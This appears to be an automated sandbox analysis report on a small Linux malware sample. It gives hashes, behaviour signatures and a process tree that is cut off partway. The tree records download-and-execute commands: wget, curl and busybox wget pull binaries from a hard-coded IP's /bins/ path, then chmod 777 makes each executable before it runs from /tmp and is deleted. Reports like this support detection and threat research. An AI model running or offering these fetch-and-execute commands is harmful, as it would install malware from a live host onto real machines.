Analysis
- max time kernel: 66s
- max time network: 120s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240729-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 09-11-2024 15:13
Static task: static1

Behavioral task: behavioral1
- Sample: 838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
- Resource: ubuntu1804-amd64-20240729-en

Behavioral task: behavioral2
- Sample: 838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
- Resource: debian9-armhf-20240611-en

Behavioral task: behavioral3
- Sample: 838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
- Resource: debian9-mipsbe-20240611-en

Behavioral task: behavioral4
- Sample: 838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
- Resource: debian9-mipsel-20240729-en
General
- Target: 838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
- Size: 10KB
- MD5: 8024f690eb7cff058a13d1d38f0b31c0
- SHA1: c4be3a2eb04473145808dd1ce797dce7815d06dc
- SHA256: 838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856
- SHA512: 9fa6258d021edb3a5423acb3c3d58dddad944e245b9f849a1f4ce16473b3976c29b7e07c4f171df4f4d8acd04988b6eba64c58a82ecf121b6c9756d10324ec9f
- SSDEEP: 192:+fEqq1c7X/8cm6S6m6W6D676ABfBga7X/8cI6S6m6W6D676wqqi:+fEqq1c7X/8c0BfBga7X/8cuqqi
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
pid process
889 chmod
925 chmod
931 chmod
955 chmod
979 chmod
745 chmod
808 chmod
856 chmod
895 chmod
901 chmod
907 chmod
937 chmod
943 chmod
819 chmod
862 chmod
783 chmod
985 chmod
949 chmod
961 chmod
967 chmod
973 chmod
754 chmod
913 chmod
883 chmod
919 chmod
877 chmod
848 chmod
871 chmod
-
Executes dropped EXE 28 IoCs
Processes:
ioc pid process
/tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ 746 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ
/tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK 756 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX 784 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX
/tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo 809 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo
/tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f 820 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f
/tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg 850 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg
/tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 857 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5
/tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay 863 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay
/tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC 872 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC
/tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem 878 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem
/tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ 884 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ
/tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw 890 Q2coityNz9jjImihquLcKzocOGf1iQj2tw
/tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX 896 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX
/tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw 902 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw
/tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ 908 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ
/tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw 914 Q2coityNz9jjImihquLcKzocOGf1iQj2tw
/tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC 920 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC
/tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem 926 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem
/tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX 932 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX
/tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw 938 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX 944 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX
/tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo 950 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo
/tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ 956 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ
/tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK 962 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK
/tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 968 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5
/tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay 974 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay
/tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f 980 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f
/tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg 986 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg
-
Reads runtime system information 28 IoCs
Processes:
description ioc process
File opened for reading /proc/sys/crypto/fips_enabled curl (28 identical entries, one per curl process in the process tree)
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description ioc process
File opened for modification /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC curl
File opened for modification /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw curl
File opened for modification /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ curl
File opened for modification /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 curl
File opened for modification /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX curl
File opened for modification /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ curl
File opened for modification /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f curl
File opened for modification /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ curl
File opened for modification /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK curl
File opened for modification /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX curl
File opened for modification /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem curl
File opened for modification /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK curl
File opened for modification /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC curl
File opened for modification /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo curl
File opened for modification /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f curl
File opened for modification /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 curl
File opened for modification /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay curl
File opened for modification /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg curl
File opened for modification /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg curl
File opened for modification /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw curl
File opened for modification /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay curl
File opened for modification /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw curl
File opened for modification /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem curl
File opened for modification /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX curl
File opened for modification /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo curl
File opened for modification /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ curl
File opened for modification /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw curl
File opened for modification /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX curl
Processes
(each entry: image path: command line (PID); child processes are indented under their parent, with triggered signatures listed beneath)
- /tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N: /tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N (PID 714)
  - /bin/rm: /bin/rm bins.sh (PID 721)
  - /usr/bin/wget: wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ (PID 723)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ (PID 743)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ (PID 744)
  - /bin/chmod: chmod 777 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ (PID 745)
      - File and Directory Permissions Modification
  - /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ: ./8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ (PID 746)
      - Executes dropped EXE
  - /bin/rm: rm 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ (PID 747)
  - /usr/bin/wget: wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK (PID 748)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK (PID 749)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK (PID 750)
  - /bin/chmod: chmod 777 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK (PID 754)
      - File and Directory Permissions Modification
  - /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK: ./pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK (PID 756)
      - Executes dropped EXE
  - /bin/rm: rm pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK (PID 759)
  - /usr/bin/wget: wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX (PID 760)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX (PID 767)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX (PID 776)
  - /bin/chmod: chmod 777 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX (PID 783)
      - File and Directory Permissions Modification
  - /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX: ./eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX (PID 784)
      - Executes dropped EXE
  - /bin/rm: rm eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX (PID 787)
  - /usr/bin/wget: wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo (PID 789)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo (PID 800)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo (PID 807)
  - /bin/chmod: chmod 777 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo (PID 808)
      - File and Directory Permissions Modification
  - /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo: ./LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo (PID 809)
      - Executes dropped EXE
  - /bin/rm: rm LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo (PID 810)
  - /usr/bin/wget: wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f (PID 811)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f (PID 812)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f (PID 813)
  - /bin/chmod: chmod 777 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f (PID 819)
      - File and Directory Permissions Modification
  - /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f: ./FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f (PID 820)
      - Executes dropped EXE
  - /bin/rm: rm FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f (PID 823)
  - /usr/bin/wget: wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg (PID 825)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg (PID 832)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg (PID 841)
  - /bin/chmod: chmod 777 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg (PID 848)
      - File and Directory Permissions Modification
  - /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg: ./F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg (PID 850)
      - Executes dropped EXE
  - /bin/rm: rm F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg (PID 852)
  - /usr/bin/wget: wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 (PID 853)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 (PID 854)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 (PID 855)
  - /bin/chmod: chmod 777 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 (PID 856)
      - File and Directory Permissions Modification
  - /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5: ./BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 (PID 857)
      - Executes dropped EXE
  - /bin/rm: rm BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 (PID 858)
  - /usr/bin/wget: wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay (PID 859)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay (PID 860)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay (PID 861)
  - /bin/chmod: chmod 777 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay (PID 862)
      - File and Directory Permissions Modification
  - /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay: ./SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay (PID 863)
      - Executes dropped EXE
  - /bin/rm: rm SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay (PID 864)
  - /usr/bin/wget: wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC (PID 865)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC (PID 869)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC (PID 870)
  - /bin/chmod: chmod 777 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC (PID 871)
      - File and Directory Permissions Modification
  - /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC: ./mJN62MA381JSNwxqMwQ7H88NQY12gs09PC (PID 872)
      - Executes dropped EXE
  - /bin/rm: rm mJN62MA381JSNwxqMwQ7H88NQY12gs09PC (PID 873)
  - /usr/bin/wget: wget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem (PID 874)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem (PID 875)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem (PID 876)
  - /bin/chmod: chmod 777 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem (PID 877)
      - File and Directory Permissions Modification
  - /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem: ./5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem (PID 878)
      - Executes dropped EXE
  - /bin/rm: rm 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem (PID 879)
  - /usr/bin/wget: wget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ (PID 880)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ (PID 881)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ (PID 882)
  - /bin/chmod: chmod 777 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ (PID 883)
      - File and Directory Permissions Modification
  - /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ: ./wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ (PID 884)
      - Executes dropped EXE
  - /bin/rm: rm wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ (PID 885)
  - /usr/bin/wget: wget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw (PID 886)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw (PID 887)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw (PID 888)
  - /bin/chmod: chmod 777 Q2coityNz9jjImihquLcKzocOGf1iQj2tw (PID 889)
      - File and Directory Permissions Modification
  - /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw: ./Q2coityNz9jjImihquLcKzocOGf1iQj2tw (PID 890)
      - Executes dropped EXE
  - /bin/rm: rm Q2coityNz9jjImihquLcKzocOGf1iQj2tw (PID 891)
  - /usr/bin/wget: wget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX (PID 892)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX (PID 893)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX (PID 894)
  - /bin/chmod: chmod 777 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX (PID 895)
      - File and Directory Permissions Modification
  - /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX: ./uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX (PID 896)
      - Executes dropped EXE
  - /bin/rm: rm uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX (PID 897)
  - /usr/bin/wget: wget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw (PID 898)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw (PID 899)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw (PID 900)
  - /bin/chmod: chmod 777 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw (PID 901)
      - File and Directory Permissions Modification
  - /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw: ./b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw (PID 902)
      - Executes dropped EXE
  - /bin/rm: rm b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw (PID 903)
  - /usr/bin/wget: wget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ (PID 904)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ (PID 905)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ (PID 906)
  - /bin/chmod: chmod 777 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ (PID 907)
      - File and Directory Permissions Modification
  - /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ: ./wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ (PID 908)
      - Executes dropped EXE
  - /bin/rm: rm wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ (PID 909)
  - /usr/bin/wget: wget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw (PID 910)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw (PID 911)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw (PID 912)
  - /bin/chmod: chmod 777 Q2coityNz9jjImihquLcKzocOGf1iQj2tw (PID 913)
      - File and Directory Permissions Modification
  - /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw: ./Q2coityNz9jjImihquLcKzocOGf1iQj2tw (PID 914)
      - Executes dropped EXE
  - /bin/rm: rm Q2coityNz9jjImihquLcKzocOGf1iQj2tw (PID 915)
  - /usr/bin/wget: wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC (PID 916)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC (PID 917)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC (PID 918)
  - /bin/chmod: chmod 777 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC (PID 919)
      - File and Directory Permissions Modification
  - /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC: ./mJN62MA381JSNwxqMwQ7H88NQY12gs09PC (PID 920)
      - Executes dropped EXE
  - /bin/rm: rm mJN62MA381JSNwxqMwQ7H88NQY12gs09PC (PID 921)
  - /usr/bin/wget: wget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem (PID 922)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem (PID 923)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem (PID 924)
  - /bin/chmod: chmod 777 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem (PID 925)
      - File and Directory Permissions Modification
  - /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem: ./5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem (PID 926)
      - Executes dropped EXE
  - /bin/rm: rm 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem (PID 927)
  - /usr/bin/wget: wget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX (PID 928)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX (PID 929)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX (PID 930)
  - /bin/chmod: chmod 777 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX (PID 931)
      - File and Directory Permissions Modification
  - /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX: ./uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX (PID 932)
      - Executes dropped EXE
  - /bin/rm: rm uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX (PID 933)
  - /usr/bin/wget: wget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw (PID 934)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw (PID 935)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw (PID 936)
  - /bin/chmod: chmod 777 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw (PID 937)
      - File and Directory Permissions Modification
  - /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw: ./b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw (PID 938)
      - Executes dropped EXE
  - /bin/rm: rm b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw (PID 939)
  - /usr/bin/wget: wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX (PID 940)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX (PID 941)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX (PID 942)
  - /bin/chmod: chmod 777 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX (PID 943)
      - File and Directory Permissions Modification
  - /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX: ./eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX (PID 944)
      - Executes dropped EXE
  - /bin/rm: rm eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX (PID 945)
  - /usr/bin/wget: wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo (PID 946)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo (PID 947)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo (PID 948)
  - /bin/chmod: chmod 777 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo (PID 949)
      - File and Directory Permissions Modification
  - /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo: ./LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo (PID 950)
      - Executes dropped EXE
  - /bin/rm: rm LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo (PID 951)
  - /usr/bin/wget: wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ (PID 952)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ (PID 953)
      - Reads runtime system information
      - Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ (PID 954)
  - /bin/chmod: chmod 777 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ (PID 955)
      - File and Directory Permissions Modification
  - /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ: ./8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ (PID 956)
      - Executes dropped EXE
  - /bin/rm: rm 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ (PID 957)
  - /usr/bin/wget: wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK (PID 958)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK (PID 959)
      - Reads runtime system information
      - Writes file to tmp directory
